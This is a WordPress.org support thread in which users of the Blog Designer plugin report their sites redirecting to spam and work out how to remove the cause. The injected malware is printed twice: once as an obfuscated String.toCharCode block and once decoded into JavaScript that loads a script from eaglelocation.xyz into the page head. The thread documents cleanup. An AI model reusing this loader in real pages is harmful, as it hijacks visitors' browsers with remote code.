Support » Plugin: Blog Designer » Redirecting to spam

  • Resolved hitenchothani3493

    (@hitenchothani3493)


    Hi There, updated the plugin to latest version and it redirects to spam site.

    Currently old plugin is active on our site.

    Please check your plugin code.

Viewing 15 replies - 1 through 15 (of 15 total)
  • @hitenchothani3493
    YO!!! We seconded this!!! We thought our website for redirected hacked after 24 hours of checking our file etc, Disabled all plugins and enabled one by one and it was Blog Desinger, we went back to version 1.8.10 (which we new worked) and still got redirected. So we thinking it is something on Blog Designer servers.

    P.S. you are not the only one.

    Thanks,
    RALLInspired

    Same here!

    Please fix it asap.

    We’ve had the same issue. It can be fixed by the following:

    In MySQL REGEX search for “toCharCode” in the “wp_options” table and the field “options_value” and delete any suspicious code enclosed in script tags.

    We found out the followig part was causing the redirect:

    
    String.toCharCode(118, 97, 114, 32, 100, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 10, 100, 46, 97, 115, 121, 110, 99, 61, 116, 114, 117, 101, 59, 10, 100, 46, 115, 114, 99, 61, 39, 104, 116, 116, 112, 115, 58, 47, 47, 101, 97, 103, 108, 101, 108, 111, 99, 97, 116, 105, 111, 110, 46, 120, 121, 122, 47, 115, 116, 97, 116, 115, 46, 106, 115, 39, 59, 10, 100, 46, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 100, 41, 59)
    

    Same problem with my client. 2 sites where redirecting to spam websites.

    Plugin Contributor khushbu padalia

    (@khushbupadalia)

    Hi,

    Sorry for the inconvenience caused to you.

    Now we have released new version of plugin 1.8.13. Please update plugin as soon as possible.

    After updating plugin, in blog designer settings page, there is a field named ‘Custom CSS’. If you found any malicious code in this field, then remove it and your issue will be solved.

    Thank you and regards,
    Khushbu

    @khushbupadalia

    Hello, we updated and still had the redirect. Looked for the Custom CSS area and there was malicious code in there (did not save the code). Removed it and so far so good, no redirects, thank you for the fast response.

    RALLInspired.

    Thanks, Worked.

    Plugin Contributor Sanjay Dabhoya

    (@sanjaydabhoya)

    Hello @doornekamph @riker64 @jb-1985

    We have fixed security issue and released new version 1.8.13.
    But you need to take few steps to clear your site and make it secure.
    Please do following,

    After updating plugin, in blog designer settings page, there is a field named ‘Custom CSS’. If you found any malicious code in this field, then remove it and your issue will be solved.

    It also worked for @hitenchothani3493 @rallinspired
    Also thanks for your confirmation.

    Regards,
    Sanjay

    Proposed solution works.

    The malicious CSS code translates to:

    var d = document.createElement('script');
    d.async=true;
    d.src='https://eaglelocation.xyz/stats.js';
    d.type='text/javascript';
    document.getElementsByTagName("head")[0].appendChild(d);

    @sanjaydabhoya Any idea why this field was editable from the outside?

    • This reply was modified 6 months, 2 weeks ago by mathijsv.
    Andrew Nevins

    (@anevins)

    WCLDN 2018 Contributor | Volunteer support

    @mathijsv, We don’t allow the disclosure of vulnerabilities here. If you wish to know more, please contact the author directly.

    We don’t allow the disclosure of vulnerabilities here. If you wish to know more, please contact the author directly.

    Fair point, sorry!

    Hi,

    We were having the same problem.
    We took out the code in the “custom CSS” field, and now we’re not having spam pages opening anymore.
    By the way we still not visualize the blog (the issue presented itself at the same time of the spam pages) and instead have this message:

    “You haven’t created and blog designer short code. plz go to Blog Designer Panel, select Blog Designs & save settings”.

    We have the short code [wp_blog_designer] on our blog page.

    Any idea on how this can be solved?

    Thank you!

    Andrew Nevins

    (@anevins)

    WCLDN 2018 Contributor | Volunteer support

    @caterinaf, Follow the plugin author’s advice:
    https://wordpress.org/support/topic/redirecting-to-spam/#post-11504585

    If that didn’t work for you then you are facing a different issue to the person who opened this thread. You can face the same symptom but the underlying issue can be different. Rather than drive this thread towards your help, please open your own: https://wordpress.org/support/plugin/blog-designer/#new-post

    @caterinaf
    We had the same issue with “You haven’t created and blog designer short code. plz go to Blog Designer Panel, select Blog Designs & save settings””. All you have to do is go to Blog Designer – “green button” Select Layout – then find your old Template, click it and save it. Bam Done blog back up a running… You will have reset your colors if changed them from default.

    RALLInspired.

    Plugin Contributor Sanjay Dabhoya

    (@sanjaydabhoya)

    Hello @mathijsv,
    to know more about vulnerabilities, it should be discussed in private, so I request you to create support ticket at
    http://support.solwininfotech.com/

    @anevins,
    Thank you for quick reply on not to discuss vulnerabilities here publicly.
    Also Thank you for your reply to @caterinaf

Viewing 15 replies - 1 through 15 (of 15 total)
  • The topic ‘Redirecting to spam’ is closed to new replies.